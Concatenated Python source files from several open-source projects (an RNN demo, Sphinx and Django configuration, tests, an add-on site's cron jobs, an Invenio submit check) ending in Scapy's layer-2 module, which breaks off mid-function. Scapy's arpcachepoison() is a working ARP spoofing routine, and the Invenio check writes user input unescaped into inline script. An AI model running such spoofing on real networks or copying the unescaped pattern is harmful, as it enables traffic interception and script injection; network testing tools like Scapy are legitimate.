return tf.matmul(outputs[-1], weights['out']) + biases['out']
def softmax(x):
rowmax = np.max(x, axis=1)
x -= rowmax.reshape((x.shape[0] ,1)) # for numerical stability
x = np.exp(x)
sum_x = np.sum(x, axis=1).reshape((x.shape[0],1))
return x / sum_x
pred = RNN(x_data, weights, biases)
cost = tf.reduce_mean(tf.squared_difference(pred, y_data))
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost)
# In[5]:
# Learning
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
for i in range(max_iter):
loss = 0
x_batch, y_batch, n_examples = make_window_batch(char_input, char_output, n_window)
for ibatch in range(x_batch.shape[0]):
x_train = x_batch[ibatch, :, :].reshape((1,-1,n_input_dim))
y_train = y_batch[ibatch, :, :].reshape((1,-1,n_output_dim))
x_test = char_input.reshape((1, n_input_len, n_input_dim))
y_test = char_output.reshape((1, n_input_len, n_input_dim))
c, _ = sess.run([cost, optimizer], feed_dict={
x_data: x_train, y_data: y_train})
p = sess.run(pred, feed_dict={x_data: x_test, y_data: y_test})
loss += c
mean_mse = loss / n_examples
if i == (max_iter-1):
pred_act = softmax(p)
if (i+1) % 100 == 0:
pred_out = np.argmax(p, axis=1)
accuracy = np.sum(char_data[1:] == pred_out)/n_output_len*100
print('Epoch:{:>4}/{},'.format(i+1,max_iter),
'Cost:{:.4f},'.format(mean_mse),
'Acc:{:>.1f},'.format(accuracy),
'Predict:', ''.join([idx_to_char[i] for i in pred_out]))
# In[6]:
# Probability plot
fig, ax = plt.subplots()
fig.set_size_inches(15,20)
plt.title('Input Sequence', y=1.08, fontsize=20)
plt.xlabel('Probability of Next Character(y) Given Current One(x)'+
'\n[window_size={}, accuracy={:.1f}]'.format(n_window, accuracy),
fontsize=20, y=1.5)
plt.ylabel('Character List', fontsize=20)
plot = plt.imshow(pred_act.T, cmap=plt.get_cmap('plasma'))
fig.colorbar(plot, fraction=0.015, pad=0.04)
plt.xticks(np.arange(len(char_data)-1), list(char_raw)[:-1], fontsize=15)
plt.yticks(np.arange(len(char_list)), [idx_to_char[i] for i in range(len(char_list))], fontsize=15)
ax.xaxis.tick_top()
# Annotate
for i, idx in zip(range(len(pred_out)), pred_out):
annotation = idx_to_char[idx]
ax.annotate(annotation, xy=(i-0.2, idx+0.2), fontsize=12)
plt.show()
# f.savefig('result_' + idx + '.png')
|
jaekookang/useful_bits
|
Machine_Learning/RNN_LSTM/predict_character/rnn_char_windowing.py
|
Python
|
mit
| 7,262
| 0.006063
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# bitk3 documentation build configuration file, created by
# sphinx-quickstart on Tue Jul 9 22:26:36 2013.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another
# directory, add these directories to sys.path here. If the directory is
# relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# Get the project root dir, which is the parent dir of this directory.
cwd = os.getcwd()
project_root = os.path.dirname(cwd)
# Insert the project root dir as the first element in the PYTHONPATH.
# This lets us ensure that the source package is imported, and that its
# version is used.
sys.path.insert(0, project_root)
import bitk3
# -- General configuration ---------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'BIoinformatics ToolKit 3'
copyright = u"2016, Davi Ortega"
# The version info for the project you're documenting, acts as replacement
# for |version| and |release|, also used in various other places throughout
# the built documents.
#
# The short X.Y version.
version = bitk3.__version__
# The full version, including alpha/beta/rc tags.
release = bitk3.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to
# some non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built
# documents.
#keep_warnings = False
# -- Options for HTML output -------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a
# theme further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as
# html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the
# top of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon
# of the docs. This file should be a Windows icon file (.ico) being
# 16x16 or 32x32 pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets)
# here, relative to this directory. They are copied after the builtin
# static files, so a file named "default.css" will overwrite the builtin
# "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page
# bottom, using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names
# to template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer.
# Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer.
# Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages
# will contain a <link> tag referring to it. The value of this option
# must be the base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'bitk3doc'
# -- Options for LaTeX output ------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [
('index', 'bitk3.tex',
u'BIoinformatics ToolKit 3 Documentation',
u'Davi Ortega', 'manual'),
]
# The name of an image file (relative to this directory) to place at
# the top of the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings
# are parts, not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'bitk3',
u'BIoinformatics ToolKit 3 Documentation',
[u'Davi Ortega'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ----------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'bitk3',
u'BIoinformatics ToolKit 3 Documentation',
u'Davi Ortega',
'bitk3',
'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
|
daviortega/bitk3
|
docs/conf.py
|
Python
|
mit
| 8,433
| 0.005336
|
from django.conf.urls import include, url
from demo.views import common
from demo.views.visadirect import fundstransfer, mvisa, reports, watchlist
from demo.views.pav import pav
from demo.views.dcas import cardinquiry
from demo.views.merchantsearch import search
from demo.views.paai.fundstransferattinq.cardattributes.fundstransferinquiry import funds_transfer_inquiry
from demo.views.paai.generalattinq.cardattributes.generalinquiry import general_inquiry
urlpatterns = [
url(r'^$', common.index),
# Payment Account Attributes Inquiry
url(r'^paai$', common.paai, name='paai'),
url(r'^paai/', include([
url(r'^fundstransferattinq/cardattributes/fundstransferinquiry$', funds_transfer_inquiry, name='paai_fti'),
url(r'^generalattinq/cardattributes/generalinquiry$', general_inquiry, name='paai_gi')
])),
# Merchant search
url(r'^merchantsearch$', common.merchantsearch, name='merchantsearch'),
url(r'^merchantsearch/', include([
url(r'^search$', search.merchant_search, name='merchantsearch_search'),
])),
# Payment account validation methods urls
url(r'^pav$', common.pav, name='pav'),
url(r'^pav/', include([
url(r'^cardvalidation$', pav.card_validation, name='pav_cardvalidation')
])),
# Digital card and account services
url(r'^dcas$', common.dcas, name='dcas'),
url(r'^dcas/', include([
url(r'^cardinquiry$', cardinquiry.debit_card_inquiry, name='dcas_debitcardinquiry')
])),
# VISA Direct methods urls
url(r'^visadirect$', common.visa_direct, name='vd'),
url(r'^visadirect/', include([
# FundsTransfer API
url(r'^fundstransfer$', fundstransfer.index, name='vd_ft'),
url(r'^fundstransfer/', include([
url(r'^pullfunds$', fundstransfer.pull, name='vd_ft_pullfunds'),
url(r'^pushfunds$', fundstransfer.push, name='vd_ft_pushfunds'),
url(r'^reversefunds$', fundstransfer.reverse, name='vd_ft_reversefunds'),
])),
# mVISA API
url(r'^mvisa$', mvisa.index, name='vd_mvisa'),
url(r'^mvisa/', include([
url(r'^cashinpushpayments$', mvisa.cipp, name='vd_mvisa_cipp'),
url(r'^cashoutpushpayments$', mvisa.copp, name='vd_mvisa_copp'),
url(r'^merchantpushpayments$', mvisa.mpp, name='vd_mvisa_mpp'),
])),
# Reports API
url(r'^reports$', reports.index, name='vd_reports'),
url(r'^reports/', include([
url(r'^transactiondata$', reports.transactiondata, name='vd_reports_transactiondata'),
])),
# WatchList Inquiry methods urls
url(r'^watchlist$', watchlist.index, name='vd_wl'),
url(r'^watchlist/', include([
url(r'^inquiry$', watchlist.inquiry, name='vd_wl_inquiry')
]))
])),
]
|
ppokrovsky/pyvdp
|
demo/demo/urls.py
|
Python
|
mit
| 2,820
| 0.002837
|
import sys
if '' not in sys.path:
sys.path.append('')
import time
import unittest
from pyactors.logs import file_logger
from pyactors.exceptions import EmptyInboxException
from tests import ForkedGreActor as TestActor
from multiprocessing import Manager
class ForkedGreenletActorTest(unittest.TestCase):
def test_run(self):
''' test_forked_green_actors.test_run
'''
test_name = 'test_forked_gen_actors.test_run'
logger = file_logger(test_name, filename='logs/%s.log' % test_name)
actor = TestActor()
actor.start()
while actor.processing:
time.sleep(0.1)
actor.stop()
result = []
while True:
try:
result.append(actor.inbox.get())
except EmptyInboxException:
break
self.assertEqual(len(result), 10)
self.assertEqual(actor.processing, False)
self.assertEqual(actor.waiting, False)
if __name__ == '__main__':
unittest.main()
|
snakeego/pyactors
|
tests/test_forked_green_actors.py
|
Python
|
bsd-2-clause
| 1,024
| 0.003906
|
from django import forms
from django_roa_client.models import RemotePage, RemotePageWithRelations
class TestForm(forms.Form):
test_field = forms.CharField()
remote_page = forms.ModelChoiceField(queryset=RemotePage.objects.all())
class RemotePageForm(forms.ModelForm):
class Meta:
model = RemotePage
class RemotePageWithRelationsForm(forms.ModelForm):
class Meta:
model = RemotePageWithRelations
|
charles-vdulac/django-roa
|
examples/django_roa_client/forms.py
|
Python
|
bsd-3-clause
| 432
| 0.002315
|
from datetime import datetime, timedelta
from django.core.files.storage import default_storage as storage
import olympia.core.logger
from olympia import amo
from olympia.activity.models import ActivityLog
from olympia.addons.models import Addon
from olympia.addons.tasks import delete_addons
from olympia.amo.utils import chunked
from olympia.files.models import FileUpload
from olympia.scanners.models import ScannerResult
from olympia.amo.models import FakeEmail
from . import tasks
from .sitemap import (
get_sitemap_path,
get_sitemaps,
get_sitemap_section_pages,
render_index_xml,
)
log = olympia.core.logger.getLogger('z.cron')
def gc(test_result=True):
"""Site-wide garbage collections."""
def days_ago(days):
return datetime.today() - timedelta(days=days)
log.info('Collecting data to delete')
logs = (
ActivityLog.objects.filter(created__lt=days_ago(90))
.exclude(action__in=amo.LOG_KEEP)
.values_list('id', flat=True)
)
for chunk in chunked(logs, 100):
tasks.delete_logs.delay(chunk)
two_weeks_ago = days_ago(15)
# Hard-delete stale add-ons with no versions. No email should be sent.
versionless_addons = Addon.unfiltered.filter(
versions__pk=None, created__lte=two_weeks_ago
).values_list('pk', flat=True)
for chunk in chunked(versionless_addons, 100):
delete_addons.delay(chunk, with_deleted=True)
# Delete stale FileUploads.
stale_uploads = FileUpload.objects.filter(created__lte=two_weeks_ago).order_by('id')
for file_upload in stale_uploads:
log.info(
'[FileUpload:{uuid}] Removing file: {path}'.format(
uuid=file_upload.uuid, path=file_upload.path
)
)
if file_upload.path:
try:
storage.delete(file_upload.path)
except OSError:
pass
file_upload.delete()
# Delete stale ScannerResults.
ScannerResult.objects.filter(upload=None, version=None).delete()
# Delete fake emails older than 90 days
FakeEmail.objects.filter(created__lte=days_ago(90)).delete()
def write_sitemaps(section=None, app_name=None):
index_url = get_sitemap_path(None, None)
sitemaps = get_sitemaps()
if (not section or section == 'index') and not app_name:
with storage.open(index_url, 'w') as index_file:
log.info('Writing sitemap index')
index_file.write(render_index_xml(sitemaps))
for _section, _app_name, _page in get_sitemap_section_pages(sitemaps):
if (section and section != _section) or (app_name and app_name != _app_name):
continue
if _page % 1000 == 1:
# log an info message every 1000 pages in a _section, _app_name
log.info(f'Writing sitemap file for {_section}, {_app_name}, {_page}')
filename = get_sitemap_path(_section, _app_name, _page)
with storage.open(filename, 'w') as sitemap_file:
sitemap_object = sitemaps.get((_section, amo.APPS.get(_app_name)))
if not sitemap_object:
continue
content = sitemap_object.render(app_name=_app_name, page=_page)
sitemap_file.write(content)
|
mozilla/olympia
|
src/olympia/amo/cron.py
|
Python
|
bsd-3-clause
| 3,247
| 0.000924
|
## This file is part of CDS Invenio.
## Copyright (C) 2002, 2003, 2004, 2005, 2006, 2007, 2008 CERN.
##
## CDS Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## CDS Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with CDS Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
__revision__ = "$Id$"
import os
import re
from invenio.dbquery import run_sql
from invenio.websubmit_config import InvenioWebSubmitFunctionStop
def Check_Group(parameters, curdir, form, user_info=None):
"""
Check that a group exists.
Read from file "/curdir/Group"
If the group does not exist, switch to page 1, step 0
"""
#Path of file containing group
if os.path.exists("%s/%s" % (curdir,'Group')):
fp = open("%s/%s" % (curdir,'Group'),"r")
group = fp.read()
group = group.replace("/","_")
group = re.sub("[\n\r]+","",group)
res = run_sql ("""SELECT id FROM usergroup WHERE name = %s""", (group,))
if len(res) == 0:
raise InvenioWebSubmitFunctionStop("""
<SCRIPT>
document.forms[0].action="/submit";
document.forms[0].curpage.value = 1;
document.forms[0].step.value = 0;
user_must_confirm_before_leaving_page = false;
document.forms[0].submit();
alert('The given group name (%s) is invalid.');
</SCRIPT>""" % (group,))
else:
raise InvenioWebSubmitFunctionStop("""
<SCRIPT>
document.forms[0].action="/submit";
document.forms[0].curpage.value = 1;
document.forms[0].step.value = 0;
user_must_confirm_before_leaving_page = false;
document.forms[0].submit();
alert('The given group name (%s) is invalid.');
</SCRIPT>""" % (group,))
return ""
|
lbjay/cds-invenio
|
modules/websubmit/lib/functions/Check_Group.py
|
Python
|
gpl-2.0
| 2,200
| 0.010455
|
## This file is part of Scapy
## See http://www.secdev.org/projects/scapy for more information
## Copyright (C) Philippe Biondi <phil@secdev.org>
## This program is published under a GPLv2 license
"""
Classes and functions for layer 2 protocols.
"""
import os,struct,time
from scapy.base_classes import Net
from scapy.config import conf
from scapy.packet import *
from scapy.ansmachine import *
from scapy.plist import SndRcvList
from scapy.fields import *
from scapy.sendrecv import srp,srp1
from scapy.arch import get_if_hwaddr
#################
## Tools ##
#################
class Neighbor:
def __init__(self):
self.resolvers = {}
def register_l3(self, l2, l3, resolve_method):
self.resolvers[l2,l3]=resolve_method
def resolve(self, l2inst, l3inst):
k = l2inst.__class__,l3inst.__class__
if k in self.resolvers:
return self.resolvers[k](l2inst,l3inst)
def __repr__(self):
return "\n".join("%-15s -> %-15s" % (l2.__name__, l3.__name__) for l2,l3 in self.resolvers)
conf.neighbor = Neighbor()
conf.netcache.new_cache("arp_cache", 120) # cache entries expire after 120s
@conf.commands.register
def getmacbyip(ip, chainCC=0):
"""Return MAC address corresponding to a given IP address"""
if isinstance(ip,Net):
ip = next(iter(ip))
ip = inet_ntoa(inet_aton(ip))
tmp = inet_aton(ip)
if (tmp[0] & 0xf0) == 0xe0: # mcast @
return "01:00:5e:%.2x:%.2x:%.2x" % (tmp[1]&0x7f,tmp[2],tmp[3])
iff,a,gw = conf.route.route(ip)
if ( (iff == "lo") or (ip == conf.route.get_if_bcast(iff)) ):
return "ff:ff:ff:ff:ff:ff"
if gw != "0.0.0.0":
ip = gw
mac = conf.netcache.arp_cache.get(ip)
if mac:
return mac
res = srp1(Ether(dst=ETHER_BROADCAST)/ARP(op="who-has", pdst=ip),
type=ETH_P_ARP,
iface = iff,
timeout=2,
verbose=0,
chainCC=chainCC,
nofilter=1)
if res is not None:
mac = res.payload.hwsrc
conf.netcache.arp_cache[ip] = mac
return mac
return None
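# Illustrative use (the address is only an example; this sends a real ARP request
# on the local network and returns None on timeout):
#   getmacbyip("192.168.0.1")   # -> e.g. "aa:bb:cc:dd:ee:ff"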
### Fields
class DestMACField(MACField):
def __init__(self, name):
MACField.__init__(self, name, None)
class SourceMACField(MACField):
def __init__(self, name):
MACField.__init__(self, name, None)
class ARPSourceMACField(MACField):
def __init__(self, name):
MACField.__init__(self, name, None)
### Layers
ETHER_TYPES['802_AD'] = 0x88a8
class Ether(Packet):
name = "Ethernet"
fields_desc = [ MACField("dst","00:00:00:01:00:00"),
MACField("src","00:00:00:02:00:00"),
XShortEnumField("type", 0x9000, ETHER_TYPES) ]
def hashret(self):
return struct.pack("H",self.type)+self.payload.hashret()
def answers(self, other):
if isinstance(other,Ether):
if self.type == other.type:
return self.payload.answers(other.payload)
return 0
def mysummary(self):
return self.sprintf("%src% > %dst% (%type%)")
@classmethod
def dispatch_hook(cls, _pkt=None, *args, **kargs):
if _pkt and len(_pkt) >= 14:
if struct.unpack("!H", _pkt[12:14])[0] <= 1500:
return Dot3
return cls
class Dot3(Packet):
name = "802.3"
fields_desc = [ DestMACField("dst"),
MACField("src", ETHER_ANY),
LenField("len", None, "H") ]
def extract_padding(self,s):
l = self.len
return s[:l],s[l:]
def answers(self, other):
if isinstance(other,Dot3):
return self.payload.answers(other.payload)
return 0
def mysummary(self):
return "802.3 %s > %s" % (self.src, self.dst)
@classmethod
def dispatch_hook(cls, _pkt=None, *args, **kargs):
if _pkt and len(_pkt) >= 14:
if struct.unpack("!H", _pkt[12:14])[0] > 1500:
return Ether
return cls
class LLC(Packet):
name = "LLC"
fields_desc = [ XByteField("dsap", 0x00),
XByteField("ssap", 0x00),
ByteField("ctrl", 0) ]
conf.neighbor.register_l3(Ether, LLC, lambda l2,l3: conf.neighbor.resolve(l2,l3.payload))
conf.neighbor.register_l3(Dot3, LLC, lambda l2,l3: conf.neighbor.resolve(l2,l3.payload))
class CookedLinux(Packet):
name = "cooked linux"
fields_desc = [ ShortEnumField("pkttype",0, {0: "unicast",
4:"sent-by-us"}), #XXX incomplete
XShortField("lladdrtype",512),
ShortField("lladdrlen",0),
StrFixedLenField("src","",8),
XShortEnumField("proto",0x800,ETHER_TYPES) ]
class SNAP(Packet):
name = "SNAP"
fields_desc = [ X3BytesField("OUI",0x000000),
XShortEnumField("code", 0x000, ETHER_TYPES) ]
conf.neighbor.register_l3(Dot3, SNAP, lambda l2,l3: conf.neighbor.resolve(l2,l3.payload))
class Dot1Q(Packet):
name = "802.1Q"
aliastypes = [ Ether ]
fields_desc = [ BitField("prio", 0, 3),
BitField("id", 0, 1),
BitField("vlan", 1, 12),
XShortEnumField("type", 0x0000, ETHER_TYPES) ]
def answers(self, other):
if isinstance(other,Dot1Q):
if ( (self.type == other.type) and
(self.vlan == other.vlan) ):
return self.payload.answers(other.payload)
else:
return self.payload.answers(other)
return 0
def default_payload_class(self, pay):
if self.type <= 1500:
return LLC
return conf.raw_layer
def extract_padding(self,s):
if self.type <= 1500:
return s[:self.type],s[self.type:]
return s,None
def mysummary(self):
if isinstance(self.underlayer, Ether):
return self.underlayer.sprintf("802.1q %Ether.src% > %Ether.dst% (%Dot1Q.type%) vlan %Dot1Q.vlan%")
else:
return self.sprintf("802.1q (%Dot1Q.type%) vlan %Dot1Q.vlan%")
conf.neighbor.register_l3(Ether, Dot1Q, lambda l2,l3: conf.neighbor.resolve(l2,l3.payload))
class STP(Packet):
name = "Spanning Tree Protocol"
fields_desc = [ ShortField("proto", 0),
ByteField("version", 0),
ByteField("bpdutype", 0),
ByteField("bpduflags", 0),
ShortField("rootid", 0),
MACField("rootmac", ETHER_ANY),
IntField("pathcost", 0),
ShortField("bridgeid", 0),
MACField("bridgemac", ETHER_ANY),
ShortField("portid", 0),
BCDFloatField("age", 1),
BCDFloatField("maxage", 20),
BCDFloatField("hellotime", 2),
BCDFloatField("fwddelay", 15) ]
class EAPOL(Packet):
name = "EAPOL"
fields_desc = [ ByteField("version", 1),
ByteEnumField("type", 0, ["EAP_PACKET", "START", "LOGOFF", "KEY", "ASF"]),
LenField("len", None, "H") ]
EAP_PACKET= 0
START = 1
LOGOFF = 2
KEY = 3
ASF = 4
def extract_padding(self, s):
l = self.len
return s[:l],s[l:]
def hashret(self):
#return chr(self.type)+self.payload.hashret()
return bytes([self.type])+self.payload.hashret()
def answers(self, other):
if isinstance(other,EAPOL):
if ( (self.type == self.EAP_PACKET) and
(other.type == self.EAP_PACKET) ):
return self.payload.answers(other.payload)
return 0
def mysummary(self):
return self.sprintf("EAPOL %EAPOL.type%")
class EAP(Packet):
name = "EAP"
fields_desc = [ ByteEnumField("code", 4, {1:"REQUEST",2:"RESPONSE",3:"SUCCESS",4:"FAILURE"}),
ByteField("id", 0),
ShortField("len",None),
ConditionalField(ByteEnumField("type",0, {1:"ID",4:"MD5"}), lambda pkt:pkt.code not in [EAP.SUCCESS, EAP.FAILURE])
]
REQUEST = 1
RESPONSE = 2
SUCCESS = 3
FAILURE = 4
TYPE_ID = 1
TYPE_MD5 = 4
def answers(self, other):
if isinstance(other,EAP):
if self.code == self.REQUEST:
return 0
elif self.code == self.RESPONSE:
if ( (other.code == self.REQUEST) and
(other.type == self.type) ):
return 1
elif other.code == self.RESPONSE:
return 1
return 0
def post_build(self, p, pay):
if self.len is None:
l = len(p)+len(pay)
p = p[:2]+bytes([((l>>8)&0xff),(l&0xff)])+p[4:]
return p+pay
class ARP(Packet):
name = "ARP"
fields_desc = [ XShortField("hwtype", 0x0001),
XShortEnumField("ptype", 0x0800, ETHER_TYPES),
ByteField("hwlen", 6),
ByteField("plen", 4),
ShortEnumField("op", 1, {"who-has":1, "is-at":2, "RARP-req":3, "RARP-rep":4, "Dyn-RARP-req":5, "Dyn-RAR-rep":6, "Dyn-RARP-err":7, "InARP-req":8, "InARP-rep":9}),
ARPSourceMACField("hwsrc"),
SourceIPField("psrc","pdst"),
MACField("hwdst", ETHER_ANY),
IPField("pdst", "0.0.0.0") ]
who_has = 1
is_at = 2
def answers(self, other):
if isinstance(other,ARP):
if ( (self.op == self.is_at) and
(other.op == self.who_has) and
(self.psrc == other.pdst) ):
return 1
return 0
def route(self):
dst = self.pdst
if isinstance(dst,Gen):
dst = next(iter(dst))
return conf.route.route(dst)
def extract_padding(self, s):
return b"",s
def mysummary(self):
if self.op == self.is_at:
return self.sprintf("ARP is at %hwsrc% says %psrc%")
elif self.op == self.who_has:
return self.sprintf("ARP who has %pdst% says %psrc%")
else:
return self.sprintf("ARP %op% %psrc% > %pdst%")
conf.neighbor.register_l3(Ether, ARP, lambda l2,l3: getmacbyip(l3.pdst))
class GRErouting(Packet):
name = "GRE routing informations"
fields_desc = [ ShortField("address_family",0),
ByteField("SRE_offset", 0),
FieldLenField("SRE_len", None, "routing_info", "B"),
StrLenField("routing_info", "", "SRE_len"),
]
class GRE(Packet):
name = "GRE"
fields_desc = [ BitField("chksum_present",0,1),
BitField("routing_present",0,1),
BitField("key_present",0,1),
BitField("seqnum_present",0,1),
BitField("strict_route_source",0,1),
BitField("recursion_control",0,3),
BitField("flags",0,5),
BitField("version",0,3),
XShortEnumField("proto", 0x0000, ETHER_TYPES),
ConditionalField(XShortField("chksum",None), lambda pkt:pkt.chksum_present==1 or pkt.routing_present==1),
ConditionalField(XShortField("offset",None), lambda pkt:pkt.chksum_present==1 or pkt.routing_present==1),
ConditionalField(XIntField("key",None), lambda pkt:pkt.key_present==1),
ConditionalField(XIntField("seqence_number",None), lambda pkt:pkt.seqnum_present==1),
]
def post_build(self, p, pay):
p += pay
if self.chksum_present and self.chksum is None:
c = checksum(p)
p = p[:4]+bytes([((c>>8)&0xff),(c&0xff)])+p[6:]
return p
class Dot1AD(Dot1Q):
name = '802_1AD'
bind_layers( Dot3, LLC, )
bind_layers( Ether, LLC, type=122)
bind_layers( Ether, Dot1Q, type=33024)
bind_layers( Ether, Dot1AD, type=0x88a8)
bind_layers( Dot1AD, Dot1AD, type=0x88a8)
bind_layers( Dot1AD, Dot1Q, type=0x8100)
bind_layers( Dot1Q, Dot1AD, type=0x88a8)
bind_layers( Ether, Ether, type=1)
bind_layers( Ether, ARP, type=2054)
bind_layers( Ether, EAPOL, type=34958)
bind_layers( Ether, EAPOL, dst='01:80:c2:00:00:03', type=34958)
bind_layers( CookedLinux, LLC, proto=122)
bind_layers( CookedLinux, Dot1Q, proto=33024)
bind_layers( CookedLinux, Ether, proto=1)
bind_layers( CookedLinux, ARP, proto=2054)
bind_layers( CookedLinux, EAPOL, proto=34958)
bind_layers( GRE, LLC, proto=122)
bind_layers( GRE, Dot1Q, proto=33024)
bind_layers( GRE, Ether, proto=1)
bind_layers( GRE, ARP, proto=2054)
bind_layers( GRE, EAPOL, proto=34958)
bind_layers( GRE, GRErouting, { "routing_present" : 1 } )
bind_layers( GRErouting, conf.raw_layer,{ "address_family" : 0, "SRE_len" : 0 })
bind_layers( GRErouting, GRErouting, { } )
bind_layers( EAPOL, EAP, type=0)
bind_layers( LLC, STP, dsap=66, ssap=66, ctrl=3)
bind_layers( LLC, SNAP, dsap=170, ssap=170, ctrl=3)
bind_layers( SNAP, Dot1Q, code=33024)
bind_layers( SNAP, Ether, code=1)
bind_layers( SNAP, ARP, code=2054)
bind_layers( SNAP, EAPOL, code=34958)
bind_layers( SNAP, STP, code=267)
conf.l2types.register(ARPHDR_ETHER, Ether)
conf.l2types.register_num2layer(ARPHDR_METRICOM, Ether)
conf.l2types.register_num2layer(ARPHDR_LOOPBACK, Ether)
conf.l2types.register_layer2num(ARPHDR_ETHER, Dot3)
conf.l2types.register(144, CookedLinux) # called LINUX_IRDA, similar to CookedLinux
conf.l2types.register(113, CookedLinux)
conf.l3types.register(ETH_P_ARP, ARP)
### Technics
@conf.commands.register
def arpcachepoison(target, victim, interval=60):
"""Poison target's cache with (your MAC,victim's IP) couple
arpcachepoison(target, victim, [interval=60]) -> None
"""
tmac = getmacbyip(target)
p = Ether(dst=tmac)/ARP(op="who-has", psrc=victim, pdst=target)
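    # Descriptive note: the forged who-has request advertises psrc=victim while the
    # Ethernet/ARP source MACs default to our own interface, so the target caches
    # (victim IP -> our MAC); re-sending every `interval` seconds keeps the
    # poisoned entry from expiring.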
try:
while 1:
sendp(p, iface_hint=target)
if conf.verb > 1:
os.write(1,b".")
time.sleep(interval)
except KeyboardInterrupt:
pass
class ARPingResult(SndRcvList):
def __init__(self, res=None, name="ARPing", stats=None):
SndRcvList.__init__(self, res, name, stats)
def show(self):
for s,r in self.res:
print(r.sprintf("%19s,Ether.src% %ARP.psrc%"))
@conf.commands.register
def arping(net, timeout=2, cache=0, verbose=None, **kargs):
"""Send ARP who-has requests to determine which hosts are up
arping(net, [cache=0,] [iface=conf.iface,] [verbose=conf.verb]) -> None
Set cache=True if you want arping to modify internal ARP-Cache"""
if verbose is None:
verbose = conf.verb
ans,unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=net), verbose=verbose,
filter="arp and arp[7] = 2", timeout=timeout, iface_hint=net, **kargs)
ans = ARPingResult(ans.res)
if cache and ans is not None:
for pair in ans:
